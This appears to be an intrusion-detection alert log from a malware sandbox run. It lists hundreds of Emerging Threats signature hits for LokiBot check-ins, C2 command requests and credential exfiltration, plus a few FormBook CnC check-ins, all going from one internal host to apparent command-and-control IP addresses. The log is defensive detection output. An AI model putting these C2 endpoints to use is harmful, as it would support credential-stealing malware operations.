05/29/24-15:46:07.455148	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49807	80	192.168.2.9	45.61.137.215
05/29/24-15:42:10.038270	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49712	80	192.168.2.9	45.61.137.215
05/29/24-15:44:39.311748	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49773	80	192.168.2.9	45.61.137.215
05/29/24-15:45:20.705538	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49788	80	192.168.2.9	45.61.137.215
05/29/24-15:45:59.101278	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49804	80	192.168.2.9	45.61.137.215
05/29/24-15:44:25.723486	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49767	80	192.168.2.9	45.61.137.215
05/29/24-15:45:20.705538	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49788	80	192.168.2.9	45.61.137.215
05/29/24-15:45:09.224417	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49785	80	192.168.2.9	45.61.137.215
05/29/24-15:42:20.544811	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49717	80	192.168.2.9	45.61.137.215
05/29/24-15:44:17.418907	TCP	2025381	ET TROJAN LokiBot Checkin	49764	80	192.168.2.9	45.61.137.215
05/29/24-15:45:28.962608	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49791	80	192.168.2.9	45.61.137.215
05/29/24-15:43:46.833672	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49752	80	192.168.2.9	45.61.137.215
05/29/24-15:45:50.755707	TCP	2025381	ET TROJAN LokiBot Checkin	49801	80	192.168.2.9	45.61.137.215
05/29/24-15:45:48.086059	TCP	2025381	ET TROJAN LokiBot Checkin	49799	80	192.168.2.9	45.61.137.215
05/29/24-15:44:58.470593	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49781	80	192.168.2.9	45.61.137.215
05/29/24-15:42:20.544811	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49717	80	192.168.2.9	45.61.137.215
05/29/24-15:43:20.008059	TCP	2025381	ET TROJAN LokiBot Checkin	49741	80	192.168.2.9	45.61.137.215
05/29/24-15:44:44.907872	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49775	80	192.168.2.9	45.61.137.215
05/29/24-15:45:31.801523	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49793	80	192.168.2.9	45.61.137.215
05/29/24-15:44:14.760597	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49763	80	192.168.2.9	45.61.137.215
05/29/24-15:43:06.437304	TCP	2025381	ET TROJAN LokiBot Checkin	49736	80	192.168.2.9	45.61.137.215
05/29/24-15:45:45.418561	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49798	80	192.168.2.9	45.61.137.215
05/29/24-15:42:31.346168	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49722	80	192.168.2.9	45.61.137.215
05/29/24-15:44:00.934566	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49757	80	192.168.2.9	45.61.137.215
05/29/24-15:43:01.102766	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49734	80	192.168.2.9	45.61.137.215
05/29/24-15:43:17.361906	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49740	80	192.168.2.9	45.61.137.215
05/29/24-15:42:17.880992	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49716	80	192.168.2.9	45.61.137.215
05/29/24-15:44:14.760597	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49763	80	192.168.2.9	45.61.137.215
05/29/24-15:43:17.361906	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49740	80	192.168.2.9	45.61.137.215
05/29/24-15:44:58.470593	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49781	80	192.168.2.9	45.61.137.215
05/29/24-15:45:45.418561	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49798	80	192.168.2.9	45.61.137.215
05/29/24-15:42:31.346168	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49722	80	192.168.2.9	45.61.137.215
05/29/24-15:43:14.729917	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49739	80	192.168.2.9	45.61.137.215
05/29/24-15:45:53.430975	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49802	80	192.168.2.9	45.61.137.215
05/29/24-15:44:12.009845	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49762	80	192.168.2.9	45.61.137.215
05/29/24-15:44:27.955456	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49768	80	192.168.2.9	3.33.130.190
05/29/24-15:45:03.852643	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49783	80	192.168.2.9	45.61.137.215
05/29/24-15:44:06.434631	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49759	80	192.168.2.9	45.61.137.215
05/29/24-15:44:36.658231	TCP	2025381	ET TROJAN LokiBot Checkin	49772	80	192.168.2.9	45.61.137.215
05/29/24-15:44:22.948804	TCP	2025381	ET TROJAN LokiBot Checkin	49766	80	192.168.2.9	45.61.137.215
05/29/24-15:45:03.852643	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49783	80	192.168.2.9	45.61.137.215
05/29/24-15:44:20.226591	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49765	80	192.168.2.9	45.61.137.215
05/29/24-15:43:33.478550	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49747	80	192.168.2.9	45.61.137.215
05/29/24-15:43:49.526860	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49753	80	192.168.2.9	45.61.137.215
05/29/24-15:43:33.478550	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49747	80	192.168.2.9	45.61.137.215
05/29/24-15:45:01.201418	TCP	2025381	ET TROJAN LokiBot Checkin	49782	80	192.168.2.9	45.61.137.215
05/29/24-15:42:58.351209	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49732	80	192.168.2.9	45.61.137.215
05/29/24-15:43:41.466952	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49750	80	192.168.2.9	45.61.137.215
05/29/24-15:43:49.526860	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49753	80	192.168.2.9	45.61.137.215
05/29/24-15:45:56.184812	TCP	2025381	ET TROJAN LokiBot Checkin	49803	80	192.168.2.9	45.61.137.215
05/29/24-15:45:17.857076	TCP	2025381	ET TROJAN LokiBot Checkin	49787	80	192.168.2.9	45.61.137.215
05/29/24-15:42:41.960861	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49726	80	192.168.2.9	45.61.137.215
05/29/24-15:43:41.466952	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49750	80	192.168.2.9	45.61.137.215
05/29/24-15:43:55.212846	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49755	80	192.168.2.9	45.61.137.215
05/29/24-15:42:50.288079	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49729	80	192.168.2.9	45.61.137.215
05/29/24-15:42:26.177150	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49720	80	192.168.2.9	45.61.137.215
05/29/24-15:45:26.168825	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49790	80	192.168.2.9	45.61.137.215
05/29/24-15:45:39.931883	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49796	80	192.168.2.9	45.61.137.215
05/29/24-15:42:12.652341	TCP	2024312	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1	49714	80	192.168.2.9	45.61.137.215
05/29/24-15:44:09.285920	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49761	80	192.168.2.9	45.61.137.215
05/29/24-15:42:12.652341	TCP	2024317	ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2	49714	80	192.168.2.9	45.61.137.215
05/29/24-15:43:09.282527	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49737	80	192.168.2.9	45.61.137.215
05/29/24-15:43:11.942922	TCP	2025381	ET TROJAN LokiBot Checkin	49738	80	192.168.2.9	45.61.137.215
05/29/24-15:43:55.212846	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49755	80	192.168.2.9	45.61.137.215
05/29/24-15:46:07.455148	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49807	80	192.168.2.9	45.61.137.215
05/29/24-15:44:09.285920	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49761	80	192.168.2.9	45.61.137.215
05/29/24-15:44:53.150602	TCP	2025381	ET TROJAN LokiBot Checkin	49779	80	192.168.2.9	45.61.137.215
05/29/24-15:45:39.931883	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49796	80	192.168.2.9	45.61.137.215
05/29/24-15:42:26.177150	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49720	80	192.168.2.9	45.61.137.215
05/29/24-15:42:39.353995	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49725	80	192.168.2.9	45.61.137.215
05/29/24-15:42:39.353995	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49725	80	192.168.2.9	45.61.137.215
05/29/24-15:44:42.013116	TCP	2025381	ET TROJAN LokiBot Checkin	49774	80	192.168.2.9	45.61.137.215
05/29/24-15:43:52.300724	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49754	80	192.168.2.9	45.61.137.215
05/29/24-15:45:37.356647	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49795	80	192.168.2.9	45.61.137.215
05/29/24-15:45:15.181530	TCP	2025381	ET TROJAN LokiBot Checkin	49786	80	192.168.2.9	45.61.137.215
05/29/24-15:45:34.630779	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49794	80	192.168.2.9	45.61.137.215
05/29/24-15:45:34.630779	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49794	80	192.168.2.9	45.61.137.215
05/29/24-15:44:55.765644	TCP	2025381	ET TROJAN LokiBot Checkin	49780	80	192.168.2.9	45.61.137.215
05/29/24-15:45:37.356647	TCP	2025381	ET TROJAN LokiBot Checkin	49795	80	192.168.2.9	45.61.137.215
05/29/24-15:42:17.880992	TCP	2025381	ET TROJAN LokiBot Checkin	49716	80	192.168.2.9	45.61.137.215
05/29/24-15:42:36.746086	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49724	80	192.168.2.9	45.61.137.215
05/29/24-15:45:20.705538	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49788	80	192.168.2.9	45.61.137.215
05/29/24-15:42:36.746086	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49724	80	192.168.2.9	45.61.137.215
05/29/24-15:45:42.784784	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49797	80	192.168.2.9	45.61.137.215
05/29/24-15:44:53.150602	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49779	80	192.168.2.9	45.61.137.215
05/29/24-15:42:10.038270	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49712	80	192.168.2.9	45.61.137.215
05/29/24-15:42:15.295734	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49715	80	192.168.2.9	45.61.137.215
05/29/24-15:43:38.811867	TCP	2025381	ET TROJAN LokiBot Checkin	49749	80	192.168.2.9	45.61.137.215
05/29/24-15:45:59.101278	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49804	80	192.168.2.9	45.61.137.215
05/29/24-15:44:03.719373	TCP	2025381	ET TROJAN LokiBot Checkin	49758	80	192.168.2.9	45.61.137.215
05/29/24-15:42:28.740548	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49721	80	192.168.2.9	45.61.137.215
05/29/24-15:42:15.295734	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49715	80	192.168.2.9	45.61.137.215
05/29/24-15:44:09.285920	TCP	2025381	ET TROJAN LokiBot Checkin	49761	80	192.168.2.9	45.61.137.215
05/29/24-15:45:50.755707	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49801	80	192.168.2.9	45.61.137.215
05/29/24-15:45:28.962608	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49791	80	192.168.2.9	45.61.137.215
05/29/24-15:45:01.201418	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49782	80	192.168.2.9	45.61.137.215
05/29/24-15:44:58.470593	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49781	80	192.168.2.9	45.61.137.215
05/29/24-15:44:47.749478	TCP	2025381	ET TROJAN LokiBot Checkin	49776	80	192.168.2.9	45.61.137.215
05/29/24-15:43:03.791896	TCP	2025381	ET TROJAN LokiBot Checkin	49735	80	192.168.2.9	45.61.137.215
05/29/24-15:44:44.907872	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49775	80	192.168.2.9	45.61.137.215
05/29/24-15:43:46.833672	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49752	80	192.168.2.9	45.61.137.215
05/29/24-15:44:44.907872	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49775	80	192.168.2.9	45.61.137.215
05/29/24-15:45:59.101278	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49804	80	192.168.2.9	45.61.137.215
05/29/24-15:45:31.801523	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49793	80	192.168.2.9	45.61.137.215
05/29/24-15:44:28.419439	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49769	80	192.168.2.9	45.61.137.215
05/29/24-15:43:46.833672	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49752	80	192.168.2.9	45.61.137.215
05/29/24-15:45:31.801523	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49793	80	192.168.2.9	45.61.137.215
05/29/24-15:43:01.102766	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49734	80	192.168.2.9	45.61.137.215
05/29/24-15:45:45.418561	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49798	80	192.168.2.9	45.61.137.215
05/29/24-15:43:17.361906	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49740	80	192.168.2.9	45.61.137.215
05/29/24-15:43:22.752549	TCP	2025381	ET TROJAN LokiBot Checkin	49742	80	192.168.2.9	45.61.137.215
05/29/24-15:43:01.102766	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49734	80	192.168.2.9	45.61.137.215
05/29/24-15:44:14.760597	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49763	80	192.168.2.9	45.61.137.215
05/29/24-15:42:31.346168	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49722	80	192.168.2.9	45.61.137.215
05/29/24-15:44:20.226591	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49765	80	192.168.2.9	45.61.137.215
05/29/24-15:44:07.397794	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49760	80	192.168.2.9	104.21.10.127
05/29/24-15:44:12.009845	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49762	80	192.168.2.9	45.61.137.215
05/29/24-15:44:33.942473	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49771	80	192.168.2.9	45.61.137.215
05/29/24-15:44:12.009845	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49762	80	192.168.2.9	45.61.137.215
05/29/24-15:44:33.942473	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49771	80	192.168.2.9	45.61.137.215
05/29/24-15:46:10.058300	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49808	80	192.168.2.9	45.61.137.215
05/29/24-15:43:52.300724	TCP	2025381	ET TROJAN LokiBot Checkin	49754	80	192.168.2.9	45.61.137.215
05/29/24-15:43:58.198557	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49756	80	192.168.2.9	45.61.137.215
05/29/24-15:43:27.019236	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49744	80	192.168.2.9	103.224.212.213
05/29/24-15:43:36.155572	TCP	2025381	ET TROJAN LokiBot Checkin	49748	80	192.168.2.9	45.61.137.215
05/29/24-15:44:06.434631	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49759	80	192.168.2.9	45.61.137.215
05/29/24-15:43:58.198557	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49756	80	192.168.2.9	45.61.137.215
05/29/24-15:42:47.538291	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49728	80	192.168.2.9	45.61.137.215
05/29/24-15:44:06.434631	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49759	80	192.168.2.9	45.61.137.215
05/29/24-15:44:20.226591	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49765	80	192.168.2.9	45.61.137.215
05/29/24-15:43:33.478550	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49747	80	192.168.2.9	45.61.137.215
05/29/24-15:42:20.544811	TCP	2025381	ET TROJAN LokiBot Checkin	49717	80	192.168.2.9	45.61.137.215
05/29/24-15:43:49.526860	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49753	80	192.168.2.9	45.61.137.215
05/29/24-15:42:41.960861	TCP	2025381	ET TROJAN LokiBot Checkin	49726	80	192.168.2.9	45.61.137.215
05/29/24-15:43:11.942922	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49738	80	192.168.2.9	45.61.137.215
05/29/24-15:46:04.642667	TCP	2025381	ET TROJAN LokiBot Checkin	49806	80	192.168.2.9	45.61.137.215
05/29/24-15:42:58.351209	TCP	2025381	ET TROJAN LokiBot Checkin	49732	80	192.168.2.9	45.61.137.215
05/29/24-15:42:33.985205	TCP	2025381	ET TROJAN LokiBot Checkin	49723	80	192.168.2.9	45.61.137.215
05/29/24-15:45:30.851082	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49792	80	192.168.2.9	101.36.116.238
05/29/24-15:43:41.466952	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49750	80	192.168.2.9	45.61.137.215
05/29/24-15:44:31.132505	TCP	2025381	ET TROJAN LokiBot Checkin	49770	80	192.168.2.9	45.61.137.215
05/29/24-15:44:39.311748	TCP	2025381	ET TROJAN LokiBot Checkin	49773	80	192.168.2.9	45.61.137.215
05/29/24-15:45:06.533178	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49784	80	192.168.2.9	45.61.137.215
05/29/24-15:44:50.468524	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49778	80	192.168.2.9	45.61.137.215
05/29/24-15:43:25.482920	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49743	80	192.168.2.9	45.61.137.215
05/29/24-15:44:25.723486	TCP	2025381	ET TROJAN LokiBot Checkin	49767	80	192.168.2.9	45.61.137.215
05/29/24-15:45:26.168825	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49790	80	192.168.2.9	45.61.137.215
05/29/24-15:45:06.533178	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49784	80	192.168.2.9	45.61.137.215
05/29/24-15:44:50.468524	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49778	80	192.168.2.9	45.61.137.215
05/29/24-15:43:09.282527	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49737	80	192.168.2.9	45.61.137.215
05/29/24-15:43:25.482920	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49743	80	192.168.2.9	45.61.137.215
05/29/24-15:46:07.455148	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49807	80	192.168.2.9	45.61.137.215
05/29/24-15:43:09.282527	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49737	80	192.168.2.9	45.61.137.215
05/29/24-15:42:55.680526	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49731	80	192.168.2.9	45.61.137.215
05/29/24-15:42:39.353995	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49725	80	192.168.2.9	45.61.137.215
05/29/24-15:43:14.729917	TCP	2025381	ET TROJAN LokiBot Checkin	49739	80	192.168.2.9	45.61.137.215
05/29/24-15:44:22.948804	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49766	80	192.168.2.9	45.61.137.215
05/29/24-15:43:28.214472	TCP	2025381	ET TROJAN LokiBot Checkin	49745	80	192.168.2.9	45.61.137.215
05/29/24-15:44:36.658231	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49772	80	192.168.2.9	45.61.137.215
05/29/24-15:45:26.168825	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49790	80	192.168.2.9	45.61.137.215
05/29/24-15:43:44.149214	TCP	2025381	ET TROJAN LokiBot Checkin	49751	80	192.168.2.9	45.61.137.215
05/29/24-15:45:42.784784	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49797	80	192.168.2.9	45.61.137.215
05/29/24-15:42:31.346168	TCP	2025381	ET TROJAN LokiBot Checkin	49722	80	192.168.2.9	45.61.137.215
05/29/24-15:43:06.437304	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49736	80	192.168.2.9	45.61.137.215
05/29/24-15:43:06.437304	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49736	80	192.168.2.9	45.61.137.215
05/29/24-15:45:34.630779	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49794	80	192.168.2.9	45.61.137.215
05/29/24-15:43:17.361906	TCP	2025381	ET TROJAN LokiBot Checkin	49740	80	192.168.2.9	45.61.137.215
05/29/24-15:45:42.784784	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49797	80	192.168.2.9	45.61.137.215
05/29/24-15:45:45.418561	TCP	2025381	ET TROJAN LokiBot Checkin	49798	80	192.168.2.9	45.61.137.215
05/29/24-15:42:15.295734	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49715	80	192.168.2.9	45.61.137.215
05/29/24-15:44:47.749478	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49776	80	192.168.2.9	45.61.137.215
05/29/24-15:44:53.150602	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49779	80	192.168.2.9	45.61.137.215
05/29/24-15:42:28.740548	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49721	80	192.168.2.9	45.61.137.215
05/29/24-15:46:04.642667	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49806	80	192.168.2.9	45.61.137.215
05/29/24-15:44:53.150602	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49779	80	192.168.2.9	45.61.137.215
05/29/24-15:45:01.201418	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49782	80	192.168.2.9	45.61.137.215
05/29/24-15:45:50.755707	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49801	80	192.168.2.9	45.61.137.215
05/29/24-15:43:09.282527	TCP	2025381	ET TROJAN LokiBot Checkin	49737	80	192.168.2.9	45.61.137.215
05/29/24-15:42:28.740548	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49721	80	192.168.2.9	45.61.137.215
05/29/24-15:43:55.212846	TCP	2025381	ET TROJAN LokiBot Checkin	49755	80	192.168.2.9	45.61.137.215
05/29/24-15:45:01.201418	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49782	80	192.168.2.9	45.61.137.215
05/29/24-15:45:50.755707	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49801	80	192.168.2.9	45.61.137.215
05/29/24-15:46:07.455148	TCP	2025381	ET TROJAN LokiBot Checkin	49807	80	192.168.2.9	45.61.137.215
05/29/24-15:44:03.719373	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49758	80	192.168.2.9	45.61.137.215
05/29/24-15:43:33.478550	TCP	2025381	ET TROJAN LokiBot Checkin	49747	80	192.168.2.9	45.61.137.215
05/29/24-15:45:17.857076	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49787	80	192.168.2.9	45.61.137.215
05/29/24-15:42:33.985205	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49723	80	192.168.2.9	45.61.137.215
05/29/24-15:44:17.418907	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49764	80	192.168.2.9	45.61.137.215
05/29/24-15:43:30.801731	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49746	80	192.168.2.9	45.61.137.215
05/29/24-15:44:17.418907	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49764	80	192.168.2.9	45.61.137.215
05/29/24-15:45:20.705538	TCP	2025381	ET TROJAN LokiBot Checkin	49788	80	192.168.2.9	45.61.137.215
05/29/24-15:46:04.642667	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49806	80	192.168.2.9	45.61.137.215
05/29/24-15:45:17.857076	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49787	80	192.168.2.9	45.61.137.215
05/29/24-15:43:30.801731	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49746	80	192.168.2.9	45.61.137.215
05/29/24-15:42:10.038270	TCP	2025381	ET TROJAN LokiBot Checkin	49712	80	192.168.2.9	45.61.137.215
05/29/24-15:42:50.288079	TCP	2025381	ET TROJAN LokiBot Checkin	49729	80	192.168.2.9	45.61.137.215
05/29/24-15:42:47.538291	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49728	80	192.168.2.9	45.61.137.215
05/29/24-15:42:52.927476	TCP	2025381	ET TROJAN LokiBot Checkin	49730	80	192.168.2.9	45.61.137.215
05/29/24-15:44:20.226591	TCP	2025381	ET TROJAN LokiBot Checkin	49765	80	192.168.2.9	45.61.137.215
05/29/24-15:44:28.419439	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49769	80	192.168.2.9	45.61.137.215
05/29/24-15:45:53.430975	TCP	2025381	ET TROJAN LokiBot Checkin	49802	80	192.168.2.9	45.61.137.215
05/29/24-15:44:28.419439	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49769	80	192.168.2.9	45.61.137.215
05/29/24-15:43:44.149214	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49751	80	192.168.2.9	45.61.137.215
05/29/24-15:45:15.181530	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49786	80	192.168.2.9	45.61.137.215
05/29/24-15:45:03.852643	TCP	2025381	ET TROJAN LokiBot Checkin	49783	80	192.168.2.9	45.61.137.215
05/29/24-15:44:00.934566	TCP	2025381	ET TROJAN LokiBot Checkin	49757	80	192.168.2.9	45.61.137.215
05/29/24-15:46:01.734415	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49805	80	192.168.2.9	45.61.137.215
05/29/24-15:44:42.013116	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49774	80	192.168.2.9	45.61.137.215
05/29/24-15:44:33.942473	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49771	80	192.168.2.9	45.61.137.215
05/29/24-15:44:14.760597	TCP	2025381	ET TROJAN LokiBot Checkin	49763	80	192.168.2.9	45.61.137.215
05/29/24-15:46:10.058300	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49808	80	192.168.2.9	45.61.137.215
05/29/24-15:44:55.765644	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49780	80	192.168.2.9	45.61.137.215
05/29/24-15:43:58.198557	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49756	80	192.168.2.9	45.61.137.215
05/29/24-15:44:42.013116	TCP	2024318	ET TROJAN LokiBot Request for C2 Commands Detected M2	49774	80	192.168.2.9	45.61.137.215
05/29/24-15:42:47.538291	TCP	2024313	ET TROJAN LokiBot Request for C2 Commands Detected M1	49728	80	192.168.2.9	45.61.137.215
05/29/24-15:43:20.008059	TCP	2021641	ET TROJAN LokiBot User-Agent (Charon/Inferno)	49741	80	192.168.2.9	45.61.137.215
05/29/24-15:45:28.962608	TCP	2025381	ET TROJAN LokiBot Checkin	49791	80	192.168.2.9	45.61.137.215
05/29/24-15:42:26.177150	TCP	2025381	ET TROJAN LokiBot Checkin	49720	80	192.168.2.9	45.61.137.215
